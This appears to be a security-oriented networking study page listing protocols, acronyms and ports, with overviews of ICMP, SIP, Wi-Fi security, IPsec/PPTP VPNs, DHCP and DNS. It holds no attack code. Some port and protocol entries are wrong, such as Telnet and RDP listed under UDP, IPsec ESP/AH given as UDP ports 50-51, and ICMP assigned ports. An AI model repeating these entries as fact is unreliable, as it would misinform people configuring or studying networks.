Skip to content

Protocols & Terminology

1. Security & Authentication Protocols

Protocol Acronym Description
Wired Equivalent Privacy WEP A wireless security protocol, now obsolete due to weak encryption.
Wi-Fi Protected Access WPA A wireless security protocol that improves upon WEP.
Temporal Key Integrity Protocol TKIP A security protocol used with WPA but now considered weak.
Pretty Good Privacy PGP A data encryption program for secure communications.
Internet Protocol Security IPsec A suite of protocols for securing network communications, commonly used in VPNs.
Extensible Authentication Protocol EAP A framework supporting multiple authentication methods.
Protected Extensible Authentication Protocol PEAP An encrypted tunnel authentication protocol.
Lightweight Extensible Authentication Protocol LEAP A Cisco proprietary authentication protocol.
Terminal Access Controller Access-Control System TACACS A protocol for authentication, authorization, and accounting (AAA).

2. Routing & Switching Protocols

Protocol Acronym Description
Routing Information Protocol RIP A distance-vector routing protocol.
Open Shortest Path First OSPF A link-state routing protocol used for IP networks.
Interior Gateway Routing Protocol IGRP A Cisco proprietary routing protocol.
Enhanced Interior Gateway Routing Protocol EIGRP An advanced Cisco proprietary routing protocol.
VLAN Trunking Protocol VTP A Layer 2 protocol for managing VLANs.
Virtual Local Area Network VLAN A method to logically segment networks.
Spanning Tree Protocol STP Prevents network loops in Ethernet networks.
Hot Standby Router Protocol HSRP A Cisco redundancy protocol for router failover.
Virtual Router Redundancy Protocol VRRP Provides automatic failover for routers.

3. Network & Transport Layer Protocols

Protocol Acronym Description
Secure Shell SSH A secure protocol for remote access.
File Transfer Protocol FTP Transfers files over a network.
Hypertext Transfer Protocol HTTP A protocol for accessing web pages.
Simple Mail Transfer Protocol SMTP A protocol for sending emails.
Network Time Protocol NTP Synchronizes computer clocks over a network.
Network Address Translation NAT Allows multiple devices to share a single public IP.
Internet Key Exchange IKE A key management protocol used in VPNs.
Generic Routing Encapsulation GRE A protocol used for VPN tunneling.
Remote Shell RSH Allows execution of commands on a remote system.

4. File & Resource Sharing Protocols

Protocol Acronym Description
Server Message Block SMB Used for sharing files and printers over a network.
Network File System NFS A protocol for remote file sharing.
Simple Network Management Protocol SNMP Used to manage network devices.

5. Virtual Private Network (VPN) & Tunneling

Protocol Acronym Description
Virtual Private Network VPN Creates a secure encrypted connection over the internet.
Point-to-Point Tunneling Protocol PPTP A VPN protocol for secure remote access.

6. Web Technologies & Internet Standards

Protocol Acronym Description
Uniform Resource Locator URL The address of a web page.
Uniform Resource Identifier URI A broader category including URLs.
Asynchronous JavaScript and XML AJAX A technology for updating web pages asynchronously.
Internet Server Application Programming Interface ISAPI A Microsoft API for web development.

7. Voice & Multimedia Protocols

Protocol Acronym Description
Session Initiation Protocol SIP A signaling protocol for voice and video communication.
Voice Over IP VOIP A technology for making phone calls over the internet.

8. Network Management & Monitoring

Protocol Acronym Description
Cisco Discovery Protocol CDP A Cisco proprietary protocol for discovering network devices.
Systems Management Server SMS A network management solution.
Microsoft Baseline Security Analyzer MBSA A tool for detecting security vulnerabilities.
Supervisory Control and Data Acquisition SCADA A control system for industrial operations.

Transmission Control Protocol

1. Transmission Control & Communication Protocols

Protocol Acronym Port Description
Transmission Control Protocol TCP - A connection-oriented protocol ensuring reliable data transmission.
Internet Control Message Protocol ICMP 0-255 Used for network troubleshooting and error reporting.
Internet Group Management Protocol IGMP 0-255 Used for multicasting.

2. Remote Access & Management

Protocol Acronym Port Description
Telnet Telnet 23 Remote login service.
Secure Shell SSH 22 Secure remote login service.
Remote Desktop Protocol RDP 3389 Used for remote desktop access.
Remote Execution REXEC 512 Executes commands on remote computers.
Remote Login RLOGIN 513 Starts an interactive shell session on a remote computer.

3. Web & Application Layer Protocols

Protocol Acronym Port Description
Hypertext Transfer Protocol HTTP 80 Transfers web pages.
Hypertext Transfer Protocol Secure HTTPS 443 Transfers secure web pages.
Simple Object Access Protocol SOAP 80, 443 Used for web services.
Secure Socket Layer SSL 443 Securely transfers files.
Squid Web Proxy HTTP-Proxy 3128 Caching and forwarding HTTP web proxy.

4. Email & Messaging Protocols

Protocol Acronym Port Description
Simple Mail Transfer Protocol SMTP 25 Sends emails.
Post Office Protocol v3 POP3 110 Retrieves emails.
Internet Message Access Protocol IMAP 143 Accesses emails.
Network News Transfer Protocol NNTP 119 Accesses newsgroups.

5. File Transfer & Storage Protocols

Protocol Acronym Port Description
File Transfer Protocol FTP 20-21 Transfers files.
Trivial File Transfer Protocol TFTP 69 Transfers files with minimal overhead.
Server Message Block SMB 445 Shares files and printers.
Network File System NFS 111, 2049 Mounts remote file systems.
Secure Copy Protocol SCP 22 Securely copies files.

6. Network Services & Addressing

Protocol Acronym Port Description
Domain Name System DNS 53 Resolves domain names to IP addresses.
Dynamic Host Configuration Protocol DHCP 67, 68 Assigns IP addresses dynamically.
Bootstrap Protocol BOOTP 67, 68 Bootstraps computers with network configuration.
Network Time Protocol NTP 123 Synchronizes computer clocks.

7. Security & Authentication Protocols

Protocol Acronym Port Description
Kerberos Kerberos 88 Used for authentication and authorization.
Lightweight Directory Access Protocol LDAP 389 Manages directory services.
Remote Authentication Dial-In User Service RADIUS 1812, 1813 Used for authentication and authorization.
Kerberized Internet Negotiation of Keys KINK 892 Provides authentication and key management.

8. Database Protocols

Protocol Acronym Port Description
Microsoft SQL Server MS-SQL-S 1433 Client connections to Microsoft SQL Server.
Oracle DB Listener Oracle-TNS 1521/1526 Listens for Oracle database connections.
Ingres Lock Ingreslock 1524 Used for Ingres database and RPC-based backdoor access.
Relational Database Management System DB2 50000 Stores and manages structured data.

9. Routing & VPN Protocols

Protocol Acronym Port Description
Open Shortest Path First OSPF 89 Used for routing.
Point-to-Point Tunneling Protocol PPTP 1723 Used for VPN connections.
Internet Security Association and Key Management Protocol ISAKMP 500 Used for VPN security negotiations.

10. VoIP & Communication Protocols

Protocol Acronym Port Description
Session Initiation Protocol SIP 5060 Used for VoIP calls.

11. Miscellaneous Protocols

Protocol Acronym Port Description
Identification Protocol Ident 113 Identifies user processes.
TCP Wrappers TCPW 113 Provides access control for network services.
X Window System X11 6000 GUI for networked computers.

User Datagram Protocol (UDP)

Methodology

UDP is a connectionless transport protocol that sends data packets without establishing a prior connection or ensuring their arrival. It operates with minimal overhead, making it faster than TCP but less reliable. UDP is widely used in real-time applications where speed is prioritized over accuracy.

Limitations

  • No error checking or retransmission, leading to possible data loss.
  • Unreliable delivery as packets may arrive out of order or not at all.
  • No built-in congestion control, which may result in network performance issues.

Here’s a summarized table of UDP protocols and their ports:

Protocol Acronym Port Description
Domain Name System DNS 53 Resolves domain names to IP addresses.
Trivial File Transfer Protocol TFTP 69 Transfers files between systems.
Network Time Protocol NTP 123 Synchronizes computer clocks.
Simple Network Management Protocol SNMP 161 Monitors and manages network devices.
Routing Information Protocol RIP 520 Exchanges routing information between routers.
Internet Key Exchange IKE 500 Establishes secure key exchange in VPNs.
Bootstrap Protocol BOOTP 68 Bootstraps hosts in a network.
Dynamic Host Configuration Protocol DHCP 67 Assigns IP addresses dynamically.
Telnet TELNET 23 Remote text-based access protocol.
MySQL MySQL 3306 Open-source database management system.
Terminal Server TS 3389 Microsoft Windows Terminal Services.
NetBIOS Name netbios-ns 137 Resolves NetBIOS names to IPs in Windows OS.
Microsoft SQL Server ms-sql-m 1434 SQL Server Browser service.
Universal Plug and Play UPnP 1900 Allows network devices to discover each other.
PostgreSQL PGSQL 5432 Object-relational database system.
Virtual Network Computing VNC 5900 Remote desktop sharing system.
X Window System X11 6000-6063 GUI support on Unix-like systems.
Syslog SYSLOG 514 Collects and stores log messages.
Internet Relay Chat IRC 194 Real-time chat protocol.
OpenPGP OpenPGP 11371 Encrypts and signs data.
Internet Protocol Security IPsec 500 Encrypts communication, often used in VPNs.
X Display Manager Control Protocol XDMCP 177 Remote login for X11-based systems.

** ICMP (Internet Control Message Protocol)**

Overview

ICMP is a network protocol used for error reporting, diagnostics, and status communication between devices. It helps in troubleshooting and determining network connectivity.

ICMP Requests

  • Echo Request: Used to check if a device is reachable (e.g., ping command).
  • Timestamp Request: Retrieves the time from a remote device.
  • Address Mask Request: Requests the subnet mask of a device.

ICMP Messages

Message Type Description
Echo Reply Response to an Echo Request.
Destination Unreachable Sent when a device cannot deliver a packet.
Redirect Informs a device to use a different router.
Time Exceeded Indicates that a packet’s TTL has expired.
Parameter Problem Sent when there's an issue with a packet's header.
Source Quench Used to slow down traffic when a device receives packets too quickly.

ICMP Versions

  • ICMPv4: Used for IPv4 networks.
  • ICMPv6: Used for IPv6, offering improved functionality.

Time-To-Live (TTL) in ICMP

  • TTL is used to limit a packet’s lifespan in the network.
  • Each hop (router) decreases the TTL value.
  • When TTL reaches 0, the packet is discarded, and a Time Exceeded message is sent back.
  • TTL can help estimate network distance and even infer the operating system of a device:
    • Windows: Default TTL = 128
    • Linux/macOS: Default TTL = 64
    • Solaris: Default TTL = 255

** VoIP (Voice over Internet Protocol)**

Overview

VoIP enables voice and multimedia communication over the internet instead of traditional phone lines. Popular VoIP applications include Skype, WhatsApp, Google Hangouts, Slack, and Zoom.

Common VoIP Ports

  • TCP/5060 & TCP/5061 → Used for Session Initiation Protocol (SIP), the most common VoIP signaling protocol.
  • TCP/1720 → Used for H.323, an older multimedia communication protocol.

SIP (Session Initiation Protocol)

SIP is responsible for initiating, maintaining, modifying, and terminating real-time communication sessions.

Method Description
INVITE Initiates a session or invites another user.
ACK Confirms receipt of an INVITE request.
BYE Terminates a session.
CANCEL Cancels a pending INVITE request.
REGISTER Registers a SIP user agent (UA) with a SIP server.
OPTIONS Requests information about a SIP server’s capabilities.

Security & Information Disclosure Risks

  • SIP can be enumerated to find users and attack accounts.
  • The SIP OPTIONS request can probe a server for supported media types, codecs, and availability.
  • Cisco VoIP systems may expose SEPxxxx.cnf files, containing configuration details for Cisco Unified Communications Manager (CUCM) and IP phones, which attackers can exploit.

VoIP is widely used but also presents security risks, making encryption and proper configurations essential for safe communications. 🔒

Wireless Networks

Methodology

Wireless networks use radio frequency (RF) technology to enable communication without physical connections. Devices such as laptops, smartphones, and tablets connect to a Wireless Access Point (WAP), which acts as a bridge to the wired network.

Types of Wireless Networks

  1. Personal Area Network (PAN) – Short-range networks (e.g., Bluetooth, Zigbee).
  2. Local Area Network (LAN) – Common WiFi networks using IEEE 802.11 standards.
  3. Metropolitan Area Network (MAN) – Covers a city using technologies like WiMAX.
  4. Wide Area Network (WAN) – Long-distance communication using cellular networks (e.g., 4G, 5G).

WiFi Communication Process

  1. Device Discovery: The client scans for available networks.
  2. Association Request: The client sends a request with details like MAC address, SSID, data rates, and security protocols.
  3. Authentication: If security is enabled, the device must pass authentication protocols such as LEAP, PEAP, or EAP-TLS.
  4. Data Transmission: Once authenticated, data is transmitted over RF channels using protocols like 802.11ac or 802.11ax (WiFi 6).

Security Mechanisms

Wireless networks implement security measures to prevent unauthorized access and data breaches:

  • WEP (Wired Equivalent Privacy) – Weak security due to small IV size and predictable encryption keys.
  • WPA (WiFi Protected Access) – Improved encryption with TKIP but still vulnerable.
  • WPA2 – Uses AES encryption and is widely used but susceptible to KRACK attacks.
  • WPA3 – Provides stronger encryption and resistance to offline password cracking.
  • Authentication Protocols:
    • LEAP (Lightweight EAP) – Cisco's proprietary protocol, vulnerable to attacks.
    • PEAP (Protected EAP) – Encrypts authentication data.
    • TACACS+ – Enhances authentication and authorization security.

Limitations

  1. WEP Security FlawsIV reuse and weak CRC checksums allow attackers to break encryption.
  2. Disassociation Attacks – Attackers send fake deauthentication packets, forcing devices off the network.
  3. Backward Compatibility Issues – Older devices may not support WPA3, leading to weaker security.
  4. Signal Interference – Wireless signals are affected by walls, electronic devices, and environmental factors.
  5. Limited IV Size in WEP – Makes it easy for attackers to decrypt network traffic.
  6. Man-in-the-Middle (MITM) Attacks – Attackers can intercept data using Rogue Access Points.

Wireless networks continue to evolve, with WiFi 6 and WiFi 7 improving speed, security, and efficiency for modern applications.

Virtual Private Networks (VPN)

Methodology

A Virtual Private Network (VPN) establishes a secure, encrypted connection between a remote device and a private network. This allows users to securely access internal network resources, such as file servers and databases, from remote locations. VPNs work by tunneling network traffic over the public internet while encrypting the data to prevent interception.

Key Components of a VPN:

  1. VPN Client – Installed on the remote device to initiate and maintain a VPN connection. (e.g., OpenVPN client)
  2. VPN Server – Manages VPN connections and routes traffic between the client and private network.
  3. Encryption – Ensures secure communication using protocols like AES and IPsec.
  4. Authentication – Uses credentials, shared secrets, or certificates to verify users.

VPN Uses and Benefits

  • Secure Remote Access: Employees can safely access internal services from anywhere.
  • Data Encryption: Prevents attackers from intercepting confidential information.
  • Cost-Effective: Uses the public internet instead of expensive dedicated connections.
  • Site-to-Site Connectivity: Connects multiple branch offices into a unified network.

Limitations

  1. Performance Issues – Encryption and tunneling may reduce speed.
  2. Compatibility – Some VPN protocols may not work behind certain firewalls.
  3. Security RisksMisconfigured VPNs can expose networks to attacks.
  4. Centralized Trust – The security of the entire VPN depends on the VPN provider.

IPsec (Internet Protocol Security)

A network security protocol used to encrypt and authenticate internet communications. It secures data by encrypting the payload of each IP packet and verifying its integrity.

IPsec Protocols:

  1. Authentication Header (AH) – Ensures data integrity and authenticity, but does not encrypt data.
  2. Encapsulating Security Payload (ESP) – Encrypts data and optionally authenticates packets.

IPsec Modes:

Mode Description
Transport Mode Encrypts only the data payload, leaving the IP header exposed. Used for host-to-host communication.
Tunnel Mode Encrypts both the data and the IP header, ideal for VPN tunnels between networks.

Ports Required for IPsec VPN:

Protocol Port Description
IP (UDP) 50-51 Routes VPN packets securely.
IKE (Internet Key Exchange) UDP/500 Negotiates encryption keys.
ESP (Encapsulating Security Payload) UDP/4500 Encrypts VPN traffic.

PPTP (Point-to-Point Tunneling Protocol)

A VPN protocol that creates a secure tunnel for transmitting data. While widely supported, PPTP is outdated and insecure, as it uses MSCHAPv2 with weak encryption (DES), making it vulnerable to attacks.

Modern Alternatives to PPTP:

  • L2TP/IPsec – More secure but requires pre-shared keys.
  • IPsec/IKEv2 – Strong security with better resilience to network changes.
  • OpenVPN – Highly secure, open-source, and widely adopted.

VPN technology continues to evolve, with WireGuard and Zero Trust Network Access (ZTNA) emerging as the next-generation solutions for secure remote access.

DHCP

What is DHCP?
Dynamic Host Configuration Protocol (DHCP) is a network protocol that automatically assigns IP addresses and other network settings (like subnet mask, gateway, and DNS) to devices. This eliminates the need for manual IP configuration and prevents address conflicts.

How DHCP Works (DORA Process):

  1. Discover – A device (DHCP client) sends a broadcast message to find a DHCP server.
  2. Offer – The DHCP server responds with an available IP address offer.
  3. Request – The client requests to use the offered IP address.
  4. Acknowledge – The server confirms the assignment, and the device can now use the IP.

IP Lease and Renewal:

  • The assigned IP is temporary (leased for a set time).
  • Before the lease expires, the device requests a renewal.
  • If approved, the lease extends; otherwise, a new IP is assigned.

Example Scenario:
Alice connects her laptop to the office Wi-Fi. The laptop requests an IP, the DHCP server offers one (e.g., 192.168.1.10), Alice’s laptop accepts, and the server confirms. This process ensures seamless network connectivity.

Why DHCP?

  • Automates IP assignment → Reduces manual work.
  • Prevents conflicts → Ensures unique IPs.
  • Efficient resource use → Recycles unused IPs.

DHCP simplifies network management, making it essential for both small and large networks.

DNS

What is DNS?

The Domain Name System (DNS) is like the internet’s phonebook. It translates human-friendly domain names (e.g., www.google.com) into machine-readable IP addresses (e.g., 93.184.216.34), allowing us to access websites without memorizing complex numbers.

DNS Hierarchy

DNS is structured in a layered system:

  1. Root Servers – The top level of DNS, directing queries to relevant TLD servers.
  2. Top-Level Domains (TLDs) – Includes extensions like .com, .org, .net, or country codes like .uk.
  3. Second-Level Domains – The main part of a website name (e.g., "example" in example.com).
  4. Subdomains/Hostnames – Further divisions within a domain (e.g., "www" in www.example.com or "mail" in mail.google.com).

How DNS Works (DNS Resolution Process)

  1. The user enters a domain (e.g., www.example.com) in a web browser.
  2. The computer first checks its local DNS cache for a saved IP address.
  3. If not found, it queries a Recursive DNS Server (provided by ISPs or services like Google DNS).
  4. The recursive server contacts a Root Server, which directs it to the correct TLD Server (e.g., .com servers).
  5. The TLD Server then directs the request to the Authoritative Name Server for example.com.
  6. The authoritative server provides the correct IP address.
  7. The recursive server returns the IP to the user's computer, allowing it to connect to the website.

This process happens in milliseconds, making internet browsing fast and seamless.

Why is DNS Important?

  • User-Friendly – Allows easy access to websites using names instead of numbers.
  • Efficient – Reduces the need for manual IP address management.
  • Fast Caching – Speeds up browsing by storing frequently used IP addresses.

DNS is a fundamental part of the internet, ensuring quick and reliable access to websites.